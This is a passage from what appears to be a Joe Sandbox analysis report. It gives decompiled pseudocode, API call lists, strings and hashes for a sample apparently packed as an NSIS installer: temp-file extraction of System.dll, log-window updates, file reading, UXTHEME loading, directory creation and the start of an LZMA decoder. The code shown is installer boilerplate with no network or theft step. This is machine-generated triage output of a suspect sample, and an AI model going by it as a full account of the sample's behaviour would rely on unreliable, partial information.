					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668("C:\Users\Albus\AppData\Local\Temp\nsoF8F7.tmp", _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp\nsoF8F7.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, "C:\Users\Albus\AppData\Local\Temp\nsoF8F7.tmp");
						_t64 = E00405CC8("C:\Users\Albus\AppData\Local\Temp\nsoF8F7.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8)); // executed
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32 ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32 ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32 ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Strings

Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp$C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp\System.dll$Call
API String ID: 1941528284-445787589
Opcode ID: 399e8552882e80e4b3524515d38fd94e295efdac2a56a00d8f68241b5a4a94ca
Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
Opcode Fuzzy Hash: 399e8552882e80e4b3524515d38fd94e295efdac2a56a00d8f68241b5a4a94ca
Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E

Uniqueness

Uniqueness Score: -1.00%

Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004056d0
0x004056da
0x004056df
0x004056e5
0x004056f0
0x004056f3
0x004056f6
0x004056fc
0x004056fc
0x00405702
0x0040570a
0x0040570d
0x0040572a
0x0040572e
0x00405737
0x00405737
0x00405741
0x0040574a
0x00405756
0x0040575d
0x00405761
0x00405764
0x00405777
0x00405785
0x00405785
0x00405789
0x0040578b
0x0040578e
0x00000000
0x0040578e
0x0040570f
0x00405717
0x0040571f
0x00405725
0x00000000
0x00405725
0x0040571f
0x0040570d
0x0040579a

APIs

lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
lstrcatW.KERNEL32 ref: 00405725
SetWindowTextW.USER32 ref: 00405737
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Part of subcall function 004066A5: lstrcatW.KERNEL32 ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

('B, xrefs: 004056EB

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: ('B
API String ID: 1495540970-2332581011
Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
														__ebp - 0x50 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1); // executed
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027b6
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F

SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004069dc
0x004069e5
0x004069e7
0x004069e7
0x004069eb
0x004069fe
0x004069f8
0x004069f8
0x004069f8
0x00406a17
0x00406a2b
0x00406a32

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
wsprintfW.USER32 ref: 00406A17
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B

Strings

UXTHEME, xrefs: 004069CE
\, xrefs: 004069ED
%s%S.dll, xrefs: 00406A11

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405ba4
0x00405ba8
0x00405bab
0x00405bb1
0x00405bb5
0x00405bb9
0x00405bc1
0x00405bc8
0x00405bce
0x00405bd5
0x00405bdc
0x00405be4
0x00405be6
0x00000000
0x00405be6
0x00405bf0
0x00405bf7
0x00405c0d
0x00000000
0x00000000
0x00000000
0x00405c0f
0x00405c13

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
GetLastError.KERNEL32 ref: 00405BF0
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
GetLastError.KERNEL32 ref: 00405C0F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-4017390910
Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00406BB0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
